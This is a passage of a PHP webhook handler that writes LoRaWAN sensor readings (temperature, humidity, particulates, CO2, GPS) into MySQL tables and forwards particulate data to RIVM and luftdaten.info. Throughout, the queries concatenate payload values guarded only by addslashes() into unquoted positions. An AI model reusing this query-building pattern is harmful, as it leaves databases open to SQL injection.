$sql = 'INSERT INTO measurement257 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement258 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement259 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement260 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000024':
if($data->dev_id == 'ttn_apld_dust_20180000000000000024') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement261 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement262 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement263 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement264 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000025':
if($data->dev_id == 'ttn_apld_dust_20180000000000000025') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement265 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement266 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement267 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement268 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000026':
if($data->dev_id == 'ttn_apld_dust_20180000000000000026') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement280 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement281 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement282 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement283 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000027':
if($data->dev_id == 'ttn_apld_dust_20180000000000000027') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement290 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement291 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement292 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement293 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000028':
if($data->dev_id == 'ttn_apld_dust_20180000000000000028') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement286 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement287 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement288 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement289 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000029':
if($data->dev_id == 'ttn_apld_dust_20180000000000000029') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement294 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement295 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement296 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement297 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '006F301517B57BF3':
if($data->dev_id == 'ttn_apld_dust_20180000000000000031') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement298 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement299 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement300 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement301 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001A':
if($data->dev_id == 'ttn_apld_dust_000000000000001a') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement85 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001B':
if($data->dev_id == 'ttn_apld_dust_000000000000001b') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement86 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001C':
if($data->dev_id == 'ttn_apld_dust_000000000000001c') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement87 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001D':
if($data->dev_id == 'ttn_apld_dust_000000000000001d') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement88 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001E':
if($data->dev_id == 'ttn_apld_dust_000000000000001e') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement89 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '000000000000001F':
if($data->dev_id == 'ttn_apld_dust_000000000000001f') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement90 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '00BC52F6E1DE255D':
if($data->dev_id == 'atranco_dustsensor_02') {
if(isset($data->payload_fields->analog_in_0)) {
$sql = 'INSERT INTO measurement91 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '005E7AC9D7AE97D6':
if($data->dev_id == 'atranco_sds011_03') {
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement127 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement128 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'AtrancoSDS011PM10 lat=52.23574,lon=5.95375';
$sendToLuftDaten = true;
$luftdatenSensorName = 'aid-altranco3';
}
}
break;
case '0077BD6073272BA9':
if($data->dev_id == 'dev_id_001') {
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement129 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement130 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'HansSSDS011PM10 lat=52.1450674,lon=6.20458898';
}
}
break;
case '00C08BC53133CA8C':
if($data->dev_id == 'rfsee_air_mjs_trial') {
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement167 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_2)) {
$sql = 'INSERT INTO measurement168 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_9)) {
$sql = 'INSERT INTO measurement302 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_9);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->luminosity_8)) {
$sql = 'INSERT INTO measurement303 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->luminosity_8);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '00CEC13936F2B303':
if($data->dev_id == 'dev_id_002') {
if(isset($data->payload_fields->temperature_2)) {
$sql = 'INSERT INTO measurement147 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_3)) {
$sql = 'INSERT INTO measurement148 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_4)) {
$sql = 'INSERT INTO measurement149 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_4);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_0)) {
$pm10 = $data->payload_fields->analog_in_0;
$sql = 'INSERT INTO measurement160 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_1)) {
$pm25 = $data->payload_fields->analog_in_1;
$sql = 'INSERT INTO measurement161 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($pm25);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($pm10) && isset($pm25)) {
$sendToRIVM = true;
$rivmSensorName = 'HansSSDS011PM10 lat=52.1450674,lon=6.20458898';
}
}
break;
case '70B3D549905D7542':
if($data->dev_id == 'lopysense01') {
if(isset($data->payload_fields->temperature_1)) {
$sql = 'INSERT INTO measurement102 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temperature_1);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->relative_humidity_2)) {
$sql = 'INSERT INTO measurement103 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->relative_humidity_2);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->barometric_pressure_3)) {
$sql = 'INSERT INTO measurement104 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->barometric_pressure_3);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_4)) {
$sql = 'INSERT INTO measurement105 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_4);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5)) {
if(isset($data->payload_fields->accelerometer_5->x)) {
$sql = 'INSERT INTO measurement106 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->x);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5->y)) {
$sql = 'INSERT INTO measurement107 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->y);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->accelerometer_5->z)) {
$sql = 'INSERT INTO measurement108 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->accelerometer_5->z);
//echo $sql;
$result = mysqlquery($sql);
}
}
if(isset($data->payload_fields->analog_in_7)) {
$sql = 'INSERT INTO measurement109 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_7);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->analog_in_6)) {
$sql = 'INSERT INTO measurement110 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_6);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case 'A81758FFFE034AFA':
if($data->dev_id == 'ersdesk') {
if(isset($data)) {
logerror('Ersdesk: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement134 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement135 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement136 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
//$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement137 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['occupancy'])) {
$sql = 'INSERT INTO measurement138 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['occupancy']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['irtempint'])) {
$sql = 'INSERT INTO measurement284 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['irtempint']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['irtempext'])) {
$sql = 'INSERT INTO measurement285 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['irtempext']);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '58A0CB0000102AAD':
if($data->dev_id == 'tbdw100deursensor') {
if(isset($data)) {
logerror('tbdw100deursensor: '.json_encode($data));
//$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
//$result = mysqlquery($sql);
}
}
break;
case '58A0CB0000101BE4':
if($data->dev_id == 'tbms100pir') {
logerror('tbms100pir: '.json_encode($data));
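// getTabsArrayPir() (defined elsewhere, not shown here) unpacks the Tabs motion-sensor
// payload into the occupancy, battery, time and motion-count fields used below.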
$arrTabs = getTabsArrayPir($data->payload_raw);
logerror('tbms100pir: '.json_encode($arrTabs));
if(isset($arrTabs['occupied'])) {
$sql = 'INSERT INTO measurement269 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['occupied']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuremaining'])) {
$sql = 'INSERT INTO measurement270 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuremaining']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuvoltage'])) {
$sql = 'INSERT INTO measurement271 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuvoltage']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['time'])) {
$sql = 'INSERT INTO measurement272 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['time']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['motioncount'])) {
$sql = 'INSERT INTO measurement273 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['motioncount']);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '58A0CB00001032E6':
if($data->dev_id == 'tbhv100healthyhome') {
logerror('tbhv100healthyhome: '.json_encode($data));
$arrTabs = getTabsArrayHealtyHome($data->payload_raw);
logerror('tbhv100healthyhome: '.json_encode($arrTabs));
if(isset($arrTabs['accuremaining'])) {
$sql = 'INSERT INTO measurement274 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuremaining']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['accuvoltage'])) {
$sql = 'INSERT INTO measurement275 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['accuvoltage']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['temperature'])) {
$sql = 'INSERT INTO measurement276 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['humidity'])) {
$sql = 'INSERT INTO measurement277 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['co2'])) {
$sql = 'INSERT INTO measurement278 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($arrTabs['voc'])) {
$sql = 'INSERT INTO measurement279 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($arrTabs['voc']);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '58A0CB00001016E0':
if($data->dev_id == 'tbhh100temphum') {
if(isset($data)) {
logerror('tbhh100temphum: '.json_encode($data));
//$sql = 'INSERT INTO measurement133 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->analog_in_0);
//echo $sql;
//$result = mysqlquery($sql);
}
}
break;
case '70B3D5499655534A':
if($data->dev_id == 'lopytrack01') {
if(isset($data->payload_fields->gps_1)) {
$sql = 'INSERT INTO gpslocation67 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->gps_1->latitude).', Lon='.addslashes($data->payload_fields->gps_1->longitude);
//echo $sql;
$result = mysqlquery($sql);
/*
$last_id = mysql_insert_id($connection);
//logerror('Result: '.$last_id);
foreach($data->metadata->gateways as $gateway)
{
$json = '{'."\n";
$json .= '"time":"'.substr($data->metadata->time, 0, 23).'",'."\n";
$json .= '"devid":"'.$data->dev_id.'",'."\n";
$json .= '"appid":"'.$data->app_id.'",'."\n";
$json .= '"gwaddr":"'.$gateway->gtw_id.'",'."\n";
$json .= '"snr":"'.$gateway->snr.'",'."\n";
$json .= '"rssi":"'.$gateway->rssi.'",'."\n";
$json .= '"freq":"'.$data->metadata->frequency.'",'."\n";
$json .= '"datarate":"'.$data->metadata->data_rate.'",'."\n";
$json .= '"lat":"'.$data->payload_fields->gps_1->latitude.'",'."\n";
$json .= '"lon":"'.$data->payload_fields->gps_1->longitude.'",'."\n";
$json .= '"appeui":"70B3D57EF0006373",'."\n";
$json .= '"alt":"'.$data->payload_fields->gps_1->altitude.'",'."\n";
$json .= '"accuracy":"0.5",'."\n";
$json .= '"provider":"gps",'."\n";
$json .= '"user_id":"<NAME>"'."\n";
//$json .= ', "experiment":"Industrial IT GPS tracker Test"'."\n";
$json .= '}';
logerror("TTN MapperJson: ".$json);
$sql1 = 'INSERT INTO gpsgateway SET Gpslocationid=\''.$last_id.'\', Gwid=\''.addslashes($gateway->gtw_id).'\', Channel=\''.addslashes($gateway->channel).'\', Rssi=\''.addslashes($gateway->rssi).'\', Snr=\''.addslashes($gateway->snr).'\'';
//echo $sql1;
logerror("GPS data: ".$sql1);
$result1 = mysqlquery($sql1);
$url = "http://ttnmapper.org/api/";
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_HEADER, false);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_HTTPHEADER, array("Content-type: application/json"));
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, $json);
logerror("voor curl");
$json_response = curl_exec($curl);
logerror("na curl");
$status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
logerror("curl status: ".$status);
if ( $status != 200 ) {
logerror("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
die("Error: call to URL $url failed with status $status, response $json_response, curl_error " . curl_error($curl) . ", curl_errno " . curl_errno($curl));
}
logerror("curl voor close");
curl_close($curl);
logerror("curl na close");
logerror("TTN MapperJson response: ".$json_response);
$response = json_decode($json_response, true);
logerror("TTN MapperJson responsejson: ".json_encode( $response));
}
*/
}
}
break;
case 'A81758FFFE034A22':
if($data->dev_id == 'ers') {
if(isset($data)) {
logerror('Hollander ERS raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement139 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement140 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement141 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement142 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement143 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case 'A81758FFFE0324E5':
if($data->dev_id == 'ersco2') {
if(isset($data)) {
logerror('Hollander ERS CO2 raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS CO2: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement151 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement152 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement153 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement154 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['co2'])) {
$sql = 'INSERT INTO measurement155 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement156 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case 'A81758FFFE03E88E':
if($data->dev_id == 'ersco2bev') {
if(isset($data)) {
logerror('Hollander ERS CO2 bev raw: '.json_encode($data));
$elsysArray = getElsysArray($data->payload_raw);
logerror('Hollander ERS CO2 bev: '.json_encode($elsysArray));
if(isset($elsysArray['temperature'])) {
$sql = 'INSERT INTO measurement304 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['temperature']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['humidity'])) {
$sql = 'INSERT INTO measurement305 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['humidity']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['light'])) {
$sql = 'INSERT INTO measurement306 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['light']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['pir'])) {
$sql = 'INSERT INTO measurement307 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['pir']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['co2'])) {
$sql = 'INSERT INTO measurement308 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['co2']);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($elsysArray['vdd'])) {
$sql = 'INSERT INTO measurement309 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($elsysArray['vdd']/1000);
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
}
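// Forward the PM10/PM2.5 readings collected above to the RIVM InfluxDB ingest endpoint
// (HTTP write API), covering roughly the last minute of measurements.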
if($sendToRIVM) {
logerror('RIVM sensorname: '.$rivmSensorName);
$d = new DateTime();
$now = $d->format('Y-m-d\TH:i:s');
$d->sub(new DateInterval('PT59S'));
$minuteBefore = $d->format('Y-m-d\TH:i:s');
$data_string = 'm_fw,id='.$rivmSensorName.',timestamp_from="'.$minuteBefore.'Z",timestamp_to="'.$now.'Z",PM10='.str_replace(',','.',$pm10).',PM10-eenheid="ug/m3",PM10-meetopstelling="SDS011",PM2.5='.str_replace(',','.',$pm25).',PM2.5-meetopstelling="SDS011"';
$ch = curl_init('http://influx.rivm.nl:8086/write?db=fw');
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch, CURLOPT_USERPWD, '<PASSWORD>');
curl_setopt($ch, CURLOPT_POSTFIELDS, $data_string);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$result = curl_exec($ch);
}
if($sendToLuftDaten) {
// luftdaten.info
$luftdatenData = '{"software_version": "1", "sensordatavalues":[{"value_type":"P1","value":"'.str_replace(',','.',$pm10).'"},{"value_type":"P2","value":"'.str_replace(',','.',$pm25).'"}]}';
$ch1 = curl_init('https://api.luftdaten.info/v1/push-sensor-data/');
curl_setopt($ch1, CURLOPT_CUSTOMREQUEST, "POST");
curl_setopt($ch1, CURLOPT_POSTFIELDS, $luftdatenData);
curl_setopt($ch1, CURLOPT_RETURNTRANSFER, true);
